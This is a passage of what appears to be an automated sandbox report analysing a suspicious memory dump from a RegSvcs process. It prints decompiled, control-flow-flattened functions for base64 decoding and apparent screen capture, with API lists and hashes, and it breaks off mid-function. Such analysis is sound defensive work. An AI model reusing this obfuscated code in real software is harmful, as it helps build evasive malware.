Function 0042C500 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 457
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E0042C500(char* _a4, int* _a8) {
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				DWORD* _v32;
				BYTE* _v36;
				int _v40;
				int _v44;
				BYTE* _v48;
				BYTE* _v52;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t94;
				int _t96;
				int _t98;
				signed int _t102;
				signed int _t105;
				signed int _t115;
				signed int _t118;
				signed int _t121;
				intOrPtr _t124;
				signed int _t145;
				intOrPtr _t148;
				int _t157;
				unsigned int _t168;
				BYTE* _t174;
				signed int _t178;
				char* _t179;
				unsigned int _t180;
				signed int _t182;
				signed int _t185;
				int* _t187;
				char* _t188;
				intOrPtr _t189;
				unsigned int _t191;
				unsigned int _t193;
				signed int _t195;
				intOrPtr _t196;
				signed int _t214;
				BYTE* _t235;
				DWORD* _t236;

				_v20 = 0x204b3ed8;
				_t235 = _v48;
				while(1) {
					_t90 = _v20;
					if(_t90 > 0xeec6e14) {
					}
					L2:
					if(_t90 <= 0x4616c897) {
						if(_t90 > 0x2154265b) {
							if(_t90 > 0x374a509a) {
								if(_t90 == 0x374a509b) {
									_t179 = _v24 * 8 - 0x670;
									_v24 = _t179;
									E00405CD8();
									E0042C500(_t179, 0x41a0);
									_t236 = _t236 + 8;
									_t92 = 0x1ab0e90e;
									if(_t179 >= 0x8b) {
										_t92 = 0x359a4a84;
									}
									L104:
									_v20 = _t92;
									while(1) {
										_t90 = _v20;
										if(_t90 > 0xeec6e14) {
										}
										goto L8;
									}
									goto L2;
								}
								if(_t90 == 0x435e3da1) {
									_v20 = 0x5b1bebb4;
								}
								continue;
							} else {
								if(_t90 == 0x2154265c) {
									_t145 = _v28 + 0xb7;
									_v28 = _t145 >> 0x00000002 & 0x00ffffff;
									_t148 = 0x4616c898;
									if(_t145 * _t145 * 0x2c95 - 1 != _t145 * _t145) {
										_t148 = 0x614631bb;
									}
									_v20 = _t148;
									_t235 = 0;
								} else {
									if(_t90 == 0x359a4a84) {
										_v44 =  *_v32;
										_v20 = 0xe3a20264;
									}
								}
								while(1) {
									_t90 = _v20;
									if(_t90 > 0xeec6e14) {
									}
									goto L2;
								}
							}
						}
						if(_t90 > 0x1ab0e90d) {
							if(_t90 == 0x1ab0e90e) {
								E0043F602(_v36);
								_t236 = _t236 + 4;
								_v20 = 0x2154265c;
							} else {
								if(_t90 == 0x204b3ed8) {
									_push(_t90);
									_v32 = _t236;
									_v20 = 0x17dbd9f7;
								}
							}
							continue;
						}
						if(_t90 == 0xeec6e15) {
							_t187 = 0xfffffff4 + (_v24 >> 0x00000007 & 0x01fff800) * 0xd0;
							_v24 = _t187;
							E0042C500(0x1927, _t187);
							_t236 = _t236 + 8;
							_t92 = 0xe88c259a;
							if(_t187 < 0x90) {
								_t92 = 0x5577d6d4;
							}
							goto L104;
						} else {
							if(_t90 == 0x17dbd9f7) {
								_v20 = 0xe88c259a;
							}
							continue;
						}
					}
					if(_t90 <= 0x614631ba) {
						if(_t90 > 0x5b1bebb3) {
							if(_t90 == 0x5b1bebb4) {
								_t157 = CryptStringToBinaryA(_a4, _v40, 1, _v36, _v32, 0, 0);
								_t196 = 0x6fa4c2e4;
								if(_t157 != 0) {
									_t196 = 0xda8ad0d;
								}
								L99:
								_v20 = _t196;
								continue;
							}
							if(_t90 != 0x603edea5) {
								continue;
							}
							_t182 = 0x62e0 + (_v24 >> 0xb) * 0x23c1;
							_v24 = _t182;
							_push(0x636a);
							_push(_t182);
							_push(0x2f6a);
							E0041F840(_v24 >> 0xb);
							_t236 = _t236 + 0xc;
							_t92 = 0xe88c259a;
							if(_t182 >= 0xe4) {
								_t92 = 0xf2bf8b37;
							}
							goto L104;
						}
						if(_t90 == 0x4616c898) {
							_t185 = _v24 >> 0x0000000a & 0xfffffffe;
							_v24 = _t185;
							_push(0x1649);
							_push(_t185);
							_push(0x2654);
							E0041F840(_t90);
							_t236 = _t236 + 0xc;
							_t92 = 0x5577d6d4;
							if(_t185 >= 0x51) {
								_t92 = 0x64d2d51;
							}
							goto L104;
						} else {
							if(_t90 == 0x5577d6d4) {
								_v52 =  &(_v36[_v44]);
								_v20 = 0x8a7477c9;
							}
							continue;
						}
					}
					if(_t90 > 0x71c5912d) {
						if(_t90 == 0x71c5912e) {
							 *_v52 = 0;
							_v20 = 0x9a29c658;
							continue;
						}
						if(_t90 != 0x79499e71) {
							continue;
						}
						_t180 = _v24 * 0x5900;
						_v24 = _t180 >> 0xf;
						E0042C500(_t180 >> 0xf, 0x4cb0);
						_t236 = _t236 + 8;
						_t92 = 0xe88c259a;
						if(_t180 < 0x370000) {
							goto L104;
						}
						L46:
						_t92 = 0x709e7a25;
						goto L104;
					}
					if(_t90 == 0x6fa4c2e4) {
						_t168 = _v28;
						_v28 = _t168 >> 0xc;
						_t92 = 0xdee81455;
						if((_t168 + 0xea) * (_t168 + 0xea) * 0x1fcf - 1 != (_t168 + 0xea) * (_t168 + 0xea)) {
							_t92 = 0x1ab0e90e;
						}
						goto L104;
					}
					if(_t90 != 0x709e7a25) {
						if(_t90 != 0x614631bb) {
							continue;
						}
						_v48 = _t235;
						return _t235;
					} else {
						_push(_v44 + 1);
						_t174 = E0043F9A4();
						_t236 = _t236 + 4;
						_v36 = _t174;
						_v20 = 0xc92049e7;
						continue;
					}
					L8:
					if(_t90 > 0xd7df6f28) {
						if(_t90 > 0xe88c2599) {
							if(_t90 > 0x64d2d50) {
								if(_t90 == 0x64d2d51) {
									_t178 = (_v24 >> 0x00000008 & 0x001fffff) + 0x7f;
									_v24 = _t178;
									E00405CD8();
									_t92 = 0xe88c259a;
									if(_t178 != 0x82) {
										_t92 = 0x374a509b;
									}
									goto L104;
								}
								if(_t90 != 0xda8ad0d) {
									continue;
								}
								_t94 = _v28 >> 0xa;
								_v28 = (_t94 * 0xdb >> 2) + 0xffffffec;
								_t196 = 0x5577d6d4;
								if(_t94 * _t94 * 0x1797 - 1 != _t94 * _t94) {
									_t196 = 0xbe8bd9a0;
								}
								goto L99;
							}
							if(_t90 == 0xe88c259a) {
								_t188 = _a4;
								_t96 = E00440010(_t188);
								_t236 = _t236 + 4;
								_v40 = _t96;
								_t235 = 0;
								_t98 = CryptStringToBinaryA(_t188, _v40, 1, 0, _v32, 0, 0);
								_t196 = 0x614631bb;
								if(_t98 != 0) {
									_t196 = 0xca7d9612;
								}
								goto L99;
							}
							if(_t90 == 0xf2bf8b37) {
								_v24 = 0;
								_push(0);
								_push(0x50d);
								_push(0x1c57);
								E0041F840(_t90);
								E0042CC81(0);
								_t236 = _t236 + 0x10;
								L42:
								_v20 = 0x709e7a25;
							}
							continue;
						}
						if(_t90 > 0xdee81454) {
							if(_t90 == 0xdee81455) {
								_t189 = 0x359a4a84;
								_t102 = 0x1584000 + _v24 * 0x36000;
								_v24 = _t102;
								if(_t102 != 0) {
									_t189 = 0x709e7a25;
								}
								_push(_t102);
								_push(0x75c);
								_push(0x3415);
								E0041F840(_t102);
								_t236 = _t236 + 0xc;
								_v20 = _t189;
								continue;
							}
							if(_t90 != 0xe3a20264) {
								continue;
							}
							_t105 = _v28 >> 0xe;
							_v28 = 0xffff9130 + _t105 * 0xc5;
							_t92 = 0x359a4a84;
							if((_t105 + 0x24) * (_t105 + 0x24) * 0x5a91 - 1 != (_t105 + 0x24) * (_t105 + 0x24)) {
								_t92 = 0xd7df6f29;
							}
							goto L104;
						}
						if(_t90 == 0xd7df6f29) {
							goto L42;
						}
						if(_t90 != 0xd91beb26) {
							continue;
						}
						_t191 = _v24 + 0xa3;
						_v24 = (_t191 >> 0xb) + 0xffffff07;
						E0042D2D9();
						_t92 = 0x934be26f;
						if(_t191 >= 0x8a000) {
							goto L46;
						} else {
							goto L104;
						}
					}
					if(_t90 > 0xb215b34f) {
						if(_t90 > 0xc92049e6) {
							if(_t90 == 0xc92049e7) {
								_t115 = _v28 + 0x79 >> 5;
								_v28 = 0x1d5a + _t115 * 0xd1;
								_t196 = 0xd91beb26;
								if(_t115 * _t115 * 0x87d - 1 != _t115 * _t115) {
									_t196 = 0x5577d6d4;
								}
								goto L99;
							}
							if(_t90 != 0xca7d9612) {
								continue;
							}
							_t118 = 0xd4 + _v28 * 0x99;
							_v28 = 0x37 + _t118 * 0xfa;
							_t196 = 0xe88c259a;
							if(_t118 * _t118 != _t118 * _t118 * 0x354f - 1) {
								_t196 = 0x359a4a84;
							}
							goto L99;
						} else {
							if(_t90 == 0xb215b350) {
								_t121 = _v28 * 0x6b >> 7;
								_v28 = 0x8a6c + _t121 * 0xf9;
								_t124 = 0x99952f51;
								if((_t121 + 0xfd) * (_t121 + 0xfd) != (_t121 + 0xfd) * (_t121 + 0xfd) * 0x4e77 - 1) {
									_t124 = 0x614631bb;
								}
								_v20 = _t124;
								_t235 = _v36;
							} else {
								if(_t90 == 0xbe8bd9a0) {
									 *_a8 =  *_v32;
									_v20 = 0xb215b350;
								}
							}
							continue;
						}
					}
					if(_t90 > 0x99952f50) {
						if(_t90 == 0x99952f51) {
							_t193 = (_v24 + 0xffffff90 >> 6) * 0x16da >> 5;
							_v24 = _t193;
							E0042C500(_t193, 0x1139);
							_t236 = _t236 + 8;
							_t92 = 0x359a4a84;
							if(_t193 != 0xc5) {
								_t92 = 0x603edea5;
							}
							goto L104;
						} else {
							if(_t90 == 0x9a29c658) {
								_v28 = ((_v28 << 0x0000000a) + 0x0003f800 >> 0x00000001) * 0x00006a00 | 0x00008400;
								_v20 = 0x435e3da1;
							}
							continue;
						}
					}
					if(_t90 == 0x8a7477c9) {
						_t214 = _v28 * 0x1617;
						_v28 = (_t214 + 0xffffff7a >> 0xa) + 0xfffffff8;
						_t196 = 0xeec6e15;
						if((_t214 - 0xa0) * (_t214 - 0xa0) * 0x880d - 1 != (_t214 - 0xa0) * (_t214 - 0xa0)) {
							_t196 = 0x71c5912e;
						}
						goto L99;
					}
					if(_t90 != 0x934be26f) {
						continue;
					} else {
						_t195 = _v24 + 0x10a;
						_v24 = _t195;
						E0042D2D9();
						_t92 = 0x709e7a25;
						if(_t195 >= 0xd7) {
							_t92 = 0x79499e71;
						}
						goto L104;
					}
				}
			}

0x0042c509
0x0042c510
0x0042c515
0x0042c515
0x0042c51d
0x0042c51d
0x0042c51f
0x0042c524
0x0042c5d8
0x0042c6db
0x0042c905
0x0042cc04
0x0042cc0b
0x0042cc0e
0x0042cc19
0x0042cc1e
0x0042cc21
0x0042cc2c
0x0042cc2e
0x0042cc2e
0x0042cc5e
0x0042cc5e
0x0042c515
0x0042c515
0x0042c51d
0x0042c51d
0x00000000
0x0042c51d
0x00000000
0x0042c515
0x0042c910
0x0042c916
0x0042c916
0x00000000
0x0042c6e1
0x0042c6e6
0x0042ca98
0x0042caae
0x0042cab1
0x0042cab8
0x0042caba
0x0042caba
0x0042cabf
0x0042cac2
0x0042c6ec
0x0042c6f1
0x0042c6fc
0x0042c6ff
0x0042c6ff
0x0042c6f1
0x0042c515
0x0042c515
0x0042c51d
0x0042c51d
0x00000000
0x0042c51d
0x0042c515
0x0042c6db
0x0042c5e3
0x0042c7e7
0x0042cb59
0x0042cb5e
0x0042cb61
0x0042c7ed
0x0042c7f2
0x0042c7f8
0x0042c7fb
0x0042c7fe
0x0042c7fe
0x0042c7f2
0x00000000
0x0042c7e7
0x0042c5ee
0x0042c9ec
0x0042c9ef
0x0042c9f8
0x0042c9fd
0x0042ca00
0x0042ca0b
0x0042ca11
0x0042ca11
0x00000000
0x0042c5f4
0x0042c5f9
0x0042c5ff
0x0042c5ff
0x00000000
0x0042c5f9
0x0042c5ee
0x0042c52f
0x0042c66e
0x0042c85d
0x0042cbb3
0x0042cbb9
0x0042cbc0
0x0042cbc2
0x0042cbc2
0x0042cbf9
0x0042cbf9
0x00000000
0x0042cbf9
0x0042c868
0x00000000
0x00000000
0x0042c87a
0x0042c880
0x0042c883
0x0042c888
0x0042c889
0x0042c88e
0x0042c893
0x0042c896
0x0042c8a1
0x0042c8a7
0x0042c8a7
0x00000000
0x0042c8a1
0x0042c679
0x0042ca21
0x0042ca24
0x0042ca27
0x0042ca2c
0x0042ca2d
0x0042ca32
0x0042ca37
0x0042ca3a
0x0042ca42
0x0042ca48
0x0042ca48
0x00000000
0x0042c67f
0x0042c684
0x0042c690
0x0042c693
0x0042c693
0x00000000
0x0042c684
0x0042c679
0x0042c53a
0x0042c75c
0x0042cb09
0x0042cb0c
0x00000000
0x0042cb0c
0x0042c767
0x00000000
0x00000000
0x0042c76d
0x0042c779
0x0042c782
0x0042c787
0x0042c78a
0x0042c795
0x00000000
0x00000000
0x0042c79b
0x0042c79b
0x00000000
0x0042c79b
0x0042c545
0x0042c96e
0x0042c984
0x0042c987
0x0042c98e
0x0042c994
0x0042c994
0x00000000
0x0042c98e
0x0042c550
0x0042cc6b
0x00000000
0x00000000
0x0042cc71
0x0042cc80
0x0042c556
0x0042c55a
0x0042c55b
0x0042c560
0x0042c563
0x0042c566
0x00000000
0x0042c566
0x0042c56f
0x0042c574
0x0042c610
0x0042c710
0x0042c927
0x0042cc41
0x0042cc44
0x0042cc47
0x0042cc4c
0x0042cc57
0x0042cc59
0x0042cc59
0x00000000
0x0042cc57
0x0042c932
0x00000000
0x00000000
0x0042c93b
0x0042c954
0x0042c957
0x0042c95e
0x0042c964
0x0042c964
0x00000000
0x0042c95e
0x0042c71b
0x0042cac9
0x0042cacd
0x0042cad2
0x0042cad5
0x0042cadb
0x0042cae9
0x0042caef
0x0042caf6
0x0042cafc
0x0042cafc
0x00000000
0x0042caf6
0x0042c726
0x0042c72c
0x0042c72f
0x0042c730
0x0042c735
0x0042c73a
0x0042c743
0x0042c748
0x0042c74b
0x0042c74b
0x0042c74b
0x00000000
0x0042c726
0x0042c61b
0x0042c80f
0x0042cb74
0x0042cb79
0x0042cb7e
0x0042cb81
0x0042cb83
0x0042cb83
0x0042cb88
0x0042cb89
0x0042cb8e
0x0042cb93
0x0042cb98
0x0042cb9b
0x00000000
0x0042cb9b
0x0042c81a
0x00000000
0x00000000
0x0042c823
0x0042c83e
0x0042c841
0x0042c848
0x0042c84e
0x0042c84e
0x00000000
0x0042c848
0x0042c626
0x00000000
0x00000000
0x0042c631
0x00000000
0x00000000
0x0042c63f
0x0042c64b
0x0042c64e
0x0042c653
0x0042c65e
0x00000000
0x0042c664
0x00000000
0x0042c664
0x0042c65e
0x0042c57f
0x0042c6a4
0x0042c8b6
0x0042cbcf
0x0042cbe8
0x0042cbeb
0x0042cbf2
0x0042cbf4
0x0042cbf4
0x00000000
0x0042cbf2
0x0042c8c1
0x00000000
0x00000000
0x0042c8ce
0x0042c8e6
0x0042c8e9
0x0042c8f0
0x0042c8f6
0x0042c8f6
0x00000000
0x0042c6aa
0x0042c6af
0x0042ca56
0x0042ca74
0x0042ca77
0x0042ca7e
0x0042ca80
0x0042ca80
0x0042ca85
0x0042ca88
0x0042c6b5
0x0042c6ba
0x0042c6c8
0x0042c6ca
0x0042c6ca
0x0042c6ba
0x00000000
0x0042c6af
0x0042c6a4
0x0042c58a
0x0042c7aa
0x0042cb27
0x0042cb2a
0x0042cb33
0x0042cb38
0x0042cb3b
0x0042cb46
0x0042cb4c
0x0042cb4c
0x00000000
0x0042c7b0
0x0042c7b5
0x0042c7d3
0x0042c7d6
0x0042c7d6
0x00000000
0x0042c7b5
0x0042c7aa
0x0042c595
0x0042c99e
0x0042c9c1
0x0042c9c4
0x0042c9cb
0x0042c9d1
0x0042c9d1
0x00000000
0x0042c9cb
0x0042c5a0
0x00000000
0x0042c5a6
0x0042c5ae
0x0042c5b0
0x0042c5b3
0x0042c5b8
0x0042c5c3
0x0042c5c9
0x0042c5c9
0x00000000
0x0042c5c3
0x0042c5a0

Strings

Gw, xrefs: 0042CAE9, 0042CBB3
\&T!, xrefs: 0042CB61
\&T!, xrefs: 0042C6E1
[&T!, xrefs: 0042C5D3

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: [&T!$\&T!$\&T!$Gw
API String ID: 0-3044390701
Opcode ID: 770f11dc5df72a7c8b6f2d5dc8cfeeedd0fa9fc2be39f26dd9e2ceec17eb37aa
Instruction ID: f59ff5930699d5b2fa08a77e28a63e2133168ad4d1af595d9bbf567b59ce839c
Opcode Fuzzy Hash: 770f11dc5df72a7c8b6f2d5dc8cfeeedd0fa9fc2be39f26dd9e2ceec17eb37aa
Instruction Fuzzy Hash: 8FF13FB1F0012A8BCF248A99F9C567FBA74EB54344FA4442BE105FB390D27DD981879B

Uniqueness

Uniqueness Score: -1.00%

Function 00427ACE Relevance: 10.6, APIs: 7, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00427ACE() {
				struct HDC__* _t26;
				struct HDC__* _t45;
				signed int _t48;
				struct HDC__** _t56;

				_t45 = _t56[0xb];
				_t56[4] = 0xd3455974;
				_t26 = 0xd3455974;
				_t48 = _t56[5];
				L1:
				while(1) {
					while(_t26 <= 0xf811430c) {
						if(_t26 > 0xdd3fcad1) {
							if(_t26 == 0xdd3fcad2) {
								_t48 = (_t48 << 6) + 0xfffffe40 >> 0xf;
								_push(_t48);
								_push(0x298b);
								_push(0x13a8);
								E00427ACE();
								_t56 =  &(_t56[3]);
								_t26 = 0xc8c246fb;
								if(_t48 == 0xe7) {
									continue;
								}
								L28:
								_t26 = 0x71034d87;
								continue;
							}
							if(_t26 == 0xe1fbda47) {
								_t56[3] = SelectObject(_t56[1], _t56[2]);
								_t26 = 0xfb8076a4;
							} else {
								if(_t26 == 0xf66a3a0b) {
									 *_t56 = CreateCompatibleDC(_t45);
									_t26 = 0xf811430d;
								}
							}
							continue;
						}
						if(_t26 > 0xd0c2f7c4) {
							if(_t26 != 0xd3455974) {
								if(_t26 != 0xd0c2f7c5) {
									continue;
								}
								_t56[4] = _t26;
								_t56[5] = _t48;
								BitBlt(_t56[8], 0, 0, _t56[0x11], _t56[0x11], _t45, 0, 0, 0xcc0020);
								SelectObject(_t56[1], _t56[3]);
								DeleteDC( *_t56);
								DeleteObject(_t56[3]);
								return _t56[2];
							}
							_t26 = 0xf66a3a0b;
							continue;
						}
						if(_t26 == 0x9c1351a6) {
							_t48 = (_t48 << 0x11) + 0x228000;
							E00427DBB();
							_t26 = 0x3e390d85;
							continue;
						}
						if(_t26 != 0xc8c246fb) {
							continue;
						} else {
							_t48 = (_t48 << 7) + 0xac;
							goto L28;
						}
					}
					if(_t26 > 0x3e390d84) {
						if(_t26 == 0x3e390d85) {
							_t48 = _t48 * 0x00002600 >> 0x00000006 & 0xffffffc0;
							E00427ED3(_t26, 0x16f5, _t48);
							_t56 =  &(_t56[2]);
							goto L28;
						}
						if(_t26 == 0x401cbff9) {
							_t56[1] = 0x1dffdc00 + _t56[1] * 0xa2000000;
							_t26 = 0xe1fbda47;
						} else {
							if(_t26 == 0x71034d87) {
								_t56[2] = CreateCompatibleBitmap(_t45, _t56[0xd], _t56[0xd]);
								_t26 = 0x401cbff9;
							}
						}
						continue;
					}
					if(_t26 == 0xf811430d) {
						goto L28;
					} else {
						if(_t26 == 0xfb8076a4) {
							_t56[1] = (0xffffffa8 + _t56[1] * 0xf2 >> 5) + 0x64;
							_t26 = 0xd0c2f7c5;
						} else {
							if(_t26 == 0x3ab05a9a) {
								_t48 = (_t48 << 0x14) + 0x74700000 + (_t48 << 0x14) * 8;
								_t26 = 0xdd3fcad2;
							}
						}
						continue;
					}
				}
			}

0x00427ad5
0x00427ad9
0x00427ae1
0x00427ae6
0x00000000
0x00427af6
0x00427af6
0x00427b02
0x00427b69
0x00427c24
0x00427c27
0x00427c28
0x00427c2d
0x00427c32
0x00427c37
0x00427c3a
0x00427c45
0x00000000
0x00000000
0x00427c83
0x00427c83
0x00000000
0x00427c83
0x00427b74
0x00427c5b
0x00427c5f
0x00427b7a
0x00427b7f
0x00427b88
0x00427b8b
0x00427b8b
0x00427b7f
0x00000000
0x00427b74
0x00427b09
0x00427bd4
0x00427cad
0x00000000
0x00000000
0x00427cb3
0x00427cb7
0x00427cd3
0x00427ce1
0x00427cea
0x00427cf4
0x00427d05
0x00427d05
0x00427bda
0x00000000
0x00427bda
0x00427b14
0x00427be7
0x00427bed
0x00427bf2
0x00000000
0x00427bf2
0x00427b1f
0x00000000
0x00427b21
0x00427b24
0x00000000
0x00427b24
0x00427b1f
0x00427b34
0x00427b9a
0x00427c72
0x00427c7b
0x00427c80
0x00000000
0x00427c80
0x00427ba5
0x00427c9a
0x00427c9e
0x00427bab
0x00427bb0
0x00427bc1
0x00427bc5
0x00427bc5
0x00427bb0
0x00000000
0x00427ba5
0x00427b3b
0x00000000
0x00427b41
0x00427b46
0x00427c0d
0x00427c11
0x00427b4c
0x00427b51
0x00427b56
0x00427b5d
0x00427b5d
0x00427b51
0x00000000
0x00427b46
0x00427b3b

APIs

CreateCompatibleDC.GDI32(?), ref: 00427B86
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00427BBF
SelectObject.GDI32(?,?), ref: 00427C55
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00427CD3
SelectObject.GDI32(?,?), ref: 00427CE1
DeleteDC.GDI32 ref: 00427CEA
DeleteObject.GDI32(?), ref: 00427CF4

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Object$CompatibleCreateDeleteSelect$Bitmap
String ID:
API String ID: 1142853709-0
Opcode ID: aa955c427f224b0267215e084936e8c9edfc894efe375c0eb83a2db6b8f1732c
Instruction ID: eb93f5fd9eec41711b7157e8890b622a73e227ccf1876cb103f94d7f39103679
Opcode Fuzzy Hash: aa955c427f224b0267215e084936e8c9edfc894efe375c0eb83a2db6b8f1732c
Instruction Fuzzy Hash: 9C41577260C324ABDA209B2DBC8592F7A94EF40724F94492BF545C6321D3BECE419B4B

Uniqueness

Uniqueness Score: -1.00%

Function 004303CD Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 336stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32 ref: 004308F6

Strings

kernel32.dll, xrefs: 004308EE
@y, xrefs: 004303FE
@y, xrefs: 0043064B
@y, xrefs: 00430971
@, xrefs: 004309B1

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: lstrcmpi
String ID: @$kernel32.dll$@y$@y$@y
API String ID: 1586166983-446354567
Opcode ID: a4b22594dd9d870d2bae2ea53af2268b0d4b749b36eb399b6bff6b7ad6fff951
Instruction ID: 5fa228e0883ae0dc767dba6e53c476f63448b07b1d79443f11d62bd0040329ba
Opcode Fuzzy Hash: a4b22594dd9d870d2bae2ea53af2268b0d4b749b36eb399b6bff6b7ad6fff951
Instruction Fuzzy Hash: 6DD184B29083019BD7548F18C5E112EBAE0EB98354F65AB1FF489DB361D23CD885DB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00427FC3 Relevance: 9.3, APIs: 2, Strings: 4, Instructions: 331
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00427FC3(intOrPtr _a4) {
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				long* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				unsigned int _v44;
				long _v48;
				void* _v52;
				intOrPtr _t67;
				intOrPtr _t74;
				signed int _t79;
				signed int _t83;
				signed int _t84;
				intOrPtr _t103;
				signed int _t111;
				unsigned int _t115;
				unsigned int _t122;
				signed int _t127;
				signed int _t129;
				intOrPtr _t134;
				unsigned int _t141;
				long* _t143;

				_v20 = 0x4ecdc7b4;
				_t115 = _v44;
				while(1) {
					_t67 = _v20;
					if(_t67 <= 0xee14e4ce) {
						goto L8;
					}
					L2:
					if(_t67 > 0x48bf767a) {
						if(_t67 > 0x6467909c) {
							if(_t67 > 0x6a1c36b0) {
								if(_t67 != 0x6a1c36b1) {
									if(_t67 != 0x719d54d8) {
										while(1) {
											_t67 = _v20;
											if(_t67 <= 0xee14e4ce) {
												goto L8;
											}
											goto L2;
										}
									}
									_v44 = _t115;
									return _t67;
								}
								_v24 = 0xffffffc2 + _v24 * 0x10ec >> 0xf;
								_v20 = 0xd7d4596b;
								while(1) {
									_t67 = _v20;
									if(_t67 <= 0xee14e4ce) {
										goto L8;
									}
									goto L2;
								}
								goto L8;
							}
							if(_t67 == 0x6467909d) {
								_t115 = 0xc25e + _t115 * 0xab;
								_push(0x2a0e);
								_push(_t115);
								_push(0x54f3);
								E00427ACE();
								_t143 = _t143 + 0xc;
								_t74 = 0x9f1e3390;
								if(_t115 < 0x75) {
									_t74 = 0x26308602;
								}
								L83:
								_v20 = _t74;
								continue;
							}
							if(_t67 != 0x648592d7) {
								continue;
							}
							_t141 = (_t115 >> 1) + 0xffffffe3;
							E00427FC3(_t141);
							_t143 = _t143 + 4;
							_t103 = 0x48bf767b;
							if(_t115 < 0x14a) {
								_t103 = 0x4ecdc7b4;
							}
							_v20 = _t103;
							_t115 = _t141;
							continue;
						}
						if(_t67 > 0x56562b3b) {
							if(_t67 == 0x56562b3c) {
								_t122 = 0x56 + _t115 * 0x5203;
								_t74 = 0xcc065e9e;
								if(_t122 >= 0x410000) {
									_t74 = 0x4ecdc7b4;
								}
								_t115 = _t122 >> 0xf;
								goto L83;
							}
							if(_t67 == 0x63b7715d) {
								E0041A37A(_t135, _a4, _v32, _v40, _v48);
								_t143 = _t143 + 0x10;
								_v52 = GetProcessHeap();
								_v20 = 0x6a1c36b1;
							}
						} else {
							if(_t67 == 0x48bf767b) {
								_v40 = _v36;
								_v20 = 0x9ead40d2;
							} else {
								if(_t67 == 0x4ecdc7b4) {
									_push(_t67);
									_v28 = _t143;
									_t143 = _t143 - 0x18;
									_v32 = _t143;
									_v20 = 0xda9ca232;
								}
							}
						}
						continue;
					}
					if(_t67 > 0x26308601) {
						if(_t67 > 0x30bae0c7) {
							if(_t67 == 0x30bae0c8) {
								_v20 = 0x48bf767b;
								continue;
							}
							if(_t67 != 0x43e811c5) {
								continue;
							}
							_t115 = (_t115 + 0xfffffffd >> 0xc) + 0xffffff24;
							_t74 = 0x4ecdc7b4;
							if(_t115 != 0xb5) {
								_t74 = 0x9e0d9405;
							}
							goto L83;
						}
						if(_t67 == 0x26308602) {
							_v36 = 0;
							_v20 = 0xde28e884;
							continue;
						}
						if(_t67 != 0x2fda1a92) {
							continue;
						} else {
							_t111 = _v24 >> 0xa;
							_v24 = _t111;
							_t127 = _t111 * _t111;
							_t135 = _t127 * 0x38b3 - 1;
							_t74 = 0x26308602;
							if(_t127 * 0x38b3 - 1 != _t127) {
								_t74 = 0xda09c84a;
							}
							goto L83;
						}
					}
					if(_t67 > 0x4b13c6) {
						if(_t67 == 0x4b13c7) {
							 *_v28 = 0;
							_v20 = 0xc58527ec;
						} else {
							if(_t67 == 0xc08bd29) {
								_v20 = 0x4b13c7;
							}
						}
						continue;
					}
					if(_t67 == 0xee14e4cf) {
						_v20 = 0x63b7715d;
						continue;
					}
					if(_t67 == 0xf0c762c2) {
						_t115 = (_t115 + 0x5d >> 0x12) + 0xb7;
						_push(0x3b8e);
						_push(0x1f4c);
						_push(_t115);
						E00427ACE();
						E00427F12(0x57a2, _t115);
						_t143 = _t143 + 0x14;
						L64:
						_v20 = 0x26308602;
					}
					continue;
					L8:
					if(_t67 <= 0xa5049a8c) {
						if(_t67 <= 0x9e0d9404) {
							if(_t67 == 0x8cef0c5d) {
								goto L64;
							}
							if(_t67 == 0x91784c25) {
								_v24 = (_v24 << 6) + 0x260 >> 4;
								_v20 = 0x30bae0c8;
							} else {
								if(_t67 == 0x940908b4) {
									_t115 = 0xa8 + _t115 * 0x28c20;
									_push(_t115);
									_push(0x1f48);
									_push(0x2171);
									E00427ACE();
									E00427F12(_t115, 0x379c);
									_t143 = _t143 + 0x14;
									_v20 = 0x4ecdc7b4;
								}
							}
							continue;
						}
						if(_t67 > 0x9ee29de5) {
							if(_t67 == 0x9ee29de6) {
								_t74 = 0x48bf767b;
								_t115 = 0x2b800000 + _t115 * 0x17800000;
								if(_t115 != 0) {
									_t74 = 0x9f1e3390;
								}
								goto L83;
							}
							if(_t67 == 0x9f1e3390) {
								E00427F12( &_v36, _v28);
								_t143 = _t143 + 8;
								_v20 = 0xa5049a8d;
							}
							continue;
						}
						if(_t67 == 0x9e0d9405) {
							_v20 = 0x6467909d;
							_t115 = 0x6e5a;
							continue;
						}
						if(_t67 != 0x9ead40d2) {
							continue;
						} else {
							_t79 = _v24 + 0x48;
							_t129 = _t79 * _t79;
							_t135 = _t129 * 0x7679 - 1;
							_v24 = _t79 << 0x00000004 & 0xffffe000;
							_t74 = 0xf0c762c2;
							if(_t129 != _t129 * 0x7679 - 1) {
								_t74 = 0xee14e4cf;
							}
							goto L83;
						}
					}
					if(_t67 > 0xd7d4596a) {
						if(_t67 > 0xda9ca231) {
							if(_t67 == 0xda9ca232) {
								_t83 = _v24 * 0x2e5c >> 0xf;
								_t84 = _t83 * _t83;
								_t135 = _t84 * 0x4dc5 - 1;
								_v24 = (_t83 << 5) + 0xfffffff7 >> 4;
								_t134 = 0x56562b3c;
								if(_t84 * 0x4dc5 - 1 != _t84) {
